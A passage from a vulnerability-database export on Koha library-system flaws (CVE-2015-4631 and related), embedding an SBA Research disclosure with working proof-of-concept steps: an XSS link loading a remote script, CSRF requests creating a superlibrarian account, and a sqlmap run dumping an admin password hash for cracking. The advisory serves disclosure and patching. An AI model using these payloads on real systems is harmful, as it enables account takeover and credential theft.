\u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malicious code gets executed. The code can then perform any unauthorized actions with the permissions of user bob. 
For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. 
\nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      }
    ],
    "trust": 5.58
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "75426",
        "trust": 3.9
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631",
        "trust": 3.8
      },
      {
        "db": "PACKETSTORM",
        "id": "132458",
        "trust": 1.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696",
        "trust": 1.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37389",
        "trust": 1.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219",
        "trust": 0.8
      },
      {
        "db": "IVD",
        "id": "70A561B4-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "72631F14-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "747C9C94-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "182E31FA-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "1AD25DDC-1E6E-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "id": "VAR-201810-0024",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ],
    "trust": 4.5804196
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 4.0
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:48.282000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 14416",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "title": "Bug 14418",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "title": "Bug 14423",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "title": "Security Release - Koha 3.20.1",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "title": "Koha 3.14.16 released",
        "trust": 0.8,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "title": "Security Release - Koha 3.16.12",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "title": "Security Release - Koha 3.18.8",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "title": "Koha directory traversal vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62257"
      },
      {
        "title": "Patch for Koha cross-site request forgery vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62260"
      },
      {
        "title": "Koha HTML Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62258"
      },
      {
        "title": "Patch for Koha Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62259"
      },
      {
        "title": "Patch for Koha SQL Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62255"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "http://www.securityfocus.com/bid/75426"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "trust": 1.6,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "trust": 1.6,
        "url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/fulldisclosure/2015/jun/80"
      },
      {
        "trust": 1.6,
        "url": "https://www.exploit-db.com/exploits/37389/"
      },
      {
        "trust": 1.6,
        "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4631"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
      },
      {
        "trust": 0.1,
        "url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
      },
      {
        "trust": 0.1,
        "url": "http://www.koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
      },
      {
        "trust": 0.1,
        "url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
      },
      {
        "trust": 0.1,
        "url": "http://sqlmap.org"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "date": "2015-06-26T23:02:22",
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "date": "2018-10-18T21:29:00.723000",
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "date": "2018-11-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "date": "2024-11-21T02:31:26.413000",
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 1.4
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting",
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      }
    ],
    "trust": 1.0
  }
}

var-201810-0026
Vulnerability from variot

Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface. Koha contains an SQL injection vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) may result. Koha is the first open source library automation system. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML-injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross-site request forgery vulnerabilities. An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files, and run attacker-supplied HTML and script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure  ===============================================================================================

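title: Koha Unauthenticated SQL injection product:         Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website:         http://www.koha-community.org/ [Note: the version lines are inconsistent as written, since a release cannot be both affected and fixed. The summary above and the release notes referenced below give 3.20.1, 3.18.8 and 3.16.12 as the fixed releases, so "3.17.8" is presumably a typo for 3.18.8 and the affected ranges are the releases before those.]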

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact:         cst@sba-research.org

References: http://koha-community.org/security-release-koha-3-20-1/         http://koha-community.org/security-release-koha-3-18-8/         http://koha-community.org/security-release-koha-3-16-12/

                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
                ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

========================= 1. If the webserver is misconfigured, the file-system may be accessed as well.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412

##################################################################################################

PoC:

##################################################################################################

  1. Inspect Koha database schema

Have a look at how to query the database for superlibrarian users:    http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

So basically we need to execute some SQL statement like this:    sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

  1. Query the database with sqlmap

So let's fire up sqlmap with the --sql-shell parameter and input the query:

root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4          _     ___ | | ___ ___  {1.0-dev-nongit-20150513}    | -| . | |     | .'| . |    ||  |||||__,|  |          ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:20:07

[09:20:07] [INFO] testing connection to the target URL    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:    ---    Parameter: number (GET)        Type: AND/OR time-based blind        Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)        Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)    ---    [09:20:09] [INFO] testing MySQL    [09:20:09] [INFO] confirming MySQL    [09:20:09] [INFO] the back-end DBMS is MySQL    web server operating system: Linux Debian    web application technology: Apache 2.4.10    back-end DBMS: MySQL >= 5.0.0    [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;    [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'    [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind    [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                          [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors     admin    [09:21:46] [INFO] retrieved: $2a$08$taQ    [09:23:33] [ERROR] invalid character detected. retrying..    [09:23:33] [WARNING] increasing time delay to 5 seconds     afOgEEhU    [09:25:10] [ERROR] invalid character detected. retrying..    [09:25:10] [WARNING] increasing time delay to 6 seconds     t/gW    [09:26:13] [ERROR] invalid character detected. retrying..    [09:26:13] [WARNING] increasing time delay to 7 seconds     TOmqnYe1Y6ZNxCENa    [09:29:57] [ERROR] invalid character detected. retrying..    [09:29:57] [WARNING] increasing time delay to 8 seconds     2.ONk2eZhnuEw5z9OjjxS    [09:35:08] [ERROR] invalid character detected. retrying..    [09:35:08] [WARNING] increasing time delay to 9 seconds 

select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:        'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

  1. Feed john the ripper and be lucky

